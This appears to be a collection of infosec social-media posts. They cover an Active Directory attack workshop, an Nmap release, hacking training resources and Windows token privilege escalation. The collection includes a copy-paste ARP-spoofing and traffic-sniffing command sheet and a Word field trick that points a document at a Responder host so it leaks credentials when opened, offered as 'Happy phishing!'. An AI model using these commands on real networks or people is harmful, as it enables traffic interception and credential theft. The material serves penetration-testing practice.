The slides and videos from our #BHUSA workshop on Active Directory attacks are now online! Access the deck and videos here: https://t.co/gsMOqH116E
Google Docs
TTPs to Attack Active Directory
Tactics, Techniques and Procedures for Attacking Active Directory BlackHat USA 2019 30-35 minutes total Link to this deck: https://bit.ly/2ZQIfGY
Nmap Defcon release! Enjoy version 7.80: https://t.co/tlaiSMzlCX
seclists.org
Nmap Announce: Nmap Defcon Release! 80+ improvements include new NSE scripts/libs, new Npcap, etc.
A huge list of:
- Ethical Hacking Trainings
- CTF-s Platforms
- Pentesting Labs
- Web Training Apps (local installation)
- Bug Bounty Platforms
From: https://t.co/37le6OIHGh
GitHub
GitHub - trimstray/the-book-of-secret-knowledge: A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners…
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.
MitM Copy&Paste Sheet 😎
#forwarding
sysctl -w net.ipv4.ip_forward=1
#redirect Traffic
arpspoof -i [Interface] -t [tgtIP] [RouterIP]
arpspoof -i [Interface] -t [RouterIP] [tgtIP]
#sniff pictures
driftnet -i [Interface]
#sniff URLs
urlsnarf -i [Interface]
Windows Token Privilege to "nt authority\system"
- Enable SE_DEBUG_NAME(debugprivileges) on the current process.
- Get a SYSTEM user token.
- Duplicate it to a Primary Token, so it can be passed to CreateProcess.
- Now we have duplicated the token, we can close the original.
- Enable SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME, these are both needed to start a process with a token.
- Enable SE_IMPERSONATE_NAME, so that we can impersonate the SYSTEM token.
- Start the process with the token.
- Clean up, revert back to self and close the handles
[Tool] Tokenvator3.5.exe
https://t.co/j8LOsvoZBH
GitHub
0xbadjuju/Tokenvator
A tool to elevate privilege with Windows Tokens.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!